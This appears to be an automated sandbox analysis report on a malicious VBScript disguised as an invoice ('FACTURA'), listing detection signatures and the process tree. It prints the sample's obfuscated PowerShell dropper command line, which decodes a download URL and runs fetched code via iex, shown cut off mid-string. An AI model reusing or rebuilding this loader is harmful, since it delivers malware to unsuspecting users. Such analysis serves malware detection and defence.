Edit tour
Windows
Analysis Report
FACTURA 130424435.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3900 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\FACTU RA 1304244 35.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1644 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Epidydim us = 1;$Pa inters21=' Substrin'; $Painters2 1+='g';Fun ction Anti meningococ cic($gejst ligt){$Nos her=$gejst ligt.Lengt h-$Epidydi mus;For($A ntisnapper =5; $Antis napper -lt $Nosher; $Antisnapp er+=(6)){$ taxmen+=$g ejstligt.$ Painters21 .Invoke($A ntisnapper , $Epidydi mus);}$tax men;}funct ion cairne d($Fremvis ningen){. ($Cha ntors) ($F remvisning en);}$Vete raness=Ant imeningoco ccic 'Mani tMNeph,oNr ingzregili .hiotlAspi rlMet.raKl is,/ Un.e5 Svam,. Afv i0Bryde Hj lp(ThundWF emmliKoo.d nServidAlk ohoVetuswG laiesTaare TtsluNDdf dsTOvern e rhve1Ambas 0 vatp.The rm0Quito;C aul Nonl W LinieiRe,u bnCarah6Fe abe4Finia; Malac .ape ixL,lla6Re ,ro4Ungar; Pre.n Note rGastrvAgm as:bazzi1T r.me2 Neph 1Spe,l.N t er0Sev.r)V elve Repri G Celievas alcChon.kP ampaorecta /Okkup2Prs ,r0Radom1E ntoc0Vov,d 0Nonst1Hem ag0,aama1 ksam Famil FUdadriRid gir NotceC h.llfCenos o .rorxCoo ns/ Warn1F .mte2Skede 1Udgif.Tie s.0Solip ' ;$Maskinaf delinger=A ntimeningo coccic 'In dviU,ables DomineBrou ,r Blok-Ta bifAnuculg Seksee ,cc enHandbtOu tbu ';$Trn gendes=Ant imeningoco ccic ' Alp ehDurditAf brytTaglip habilsKal, i:Super/De e,d/Feticd Showr Cym oiLokalvRe heae lant. Tvrfg tjs vo Flado R esogSe,icl Saf,aeSpir o.Lnpolc G illoNive m Untan/c vi luPate cWa ,tr?Smelte ConquxSp i tpSta,doSe rvir O.ert ramp=Bold hdGeon.ogr iotw Indkn TromllAffr eo diskaUd mand.orti& PhylliDe.r wdTaint=No np,1 Pinn0 InddanAkti vj LarmVKo ombWCatalC bn.elqag.i p2 Undeq k os kNonreM .anscZ edd yzMiniakAr ticlAfkogk PoveAArde aM WiseX,a linZVenge6 Epit TPeng e1Recla5,e ntrjVek,lT LevneP nde r2 glycRVi nhakRaakrb SamfuHPont . ';$Skula pstavs=Ant imeningoco ccic 'Deli g>Crash '; $Chantors= Antimening ococcic 'F lymeiMason eHash.xShe i ';$Anniv ersariness = Antimen ingococcic 'no.mae S ta,cBassoh .gpaaoUdv. k Symp% Wi ,daS,mfupM isr,pMeden dHa niaSys tetOverfaM otst% .ryd \BadesCAnt .caBe alb .esaa,reps sHuskesMal guoForesuE volu.Fungi TStatsuPou ndnOpst Pa lae&disku& Chain cret aeRadiocSa rcohBegrao Arar Anat o$Divis '; cairned (A ntimeningo coccic 'Un im $Afvu,g Henk,lOve eoGallib P reaaExingl Hilbe:Lleb rT,entroFo rt s Pahac OversaRami fn Ana aOm ski=Tor i( AntalcAc.m pmIdeendTa lel Nylon/ rif,ec Vam b korru$ A garA sychn Winten Pho niho otvde ltaeRudelr AvilasG li oa,kalmrBa stkiAa,ekn Sol.reFort rsBlocks . agr)Subpr ');cairned (Antimeni ngococcic ' oshy$Mob legS.kofl Fac,o Voca bTrst aKon omlPipin:, elchLtidss yCellanO,i efn For eB rnd dSynod sSaddelA.i ata,orbrgr evesePreas nGaranedes i.s Anjo1S ku k6Black =Affal$ Ko mmTSae nrE ,astnNedri gAiluregod sen.rypad TerreLdige sUnref.Bje rgsEk,popJ orddlA ret iStrantMan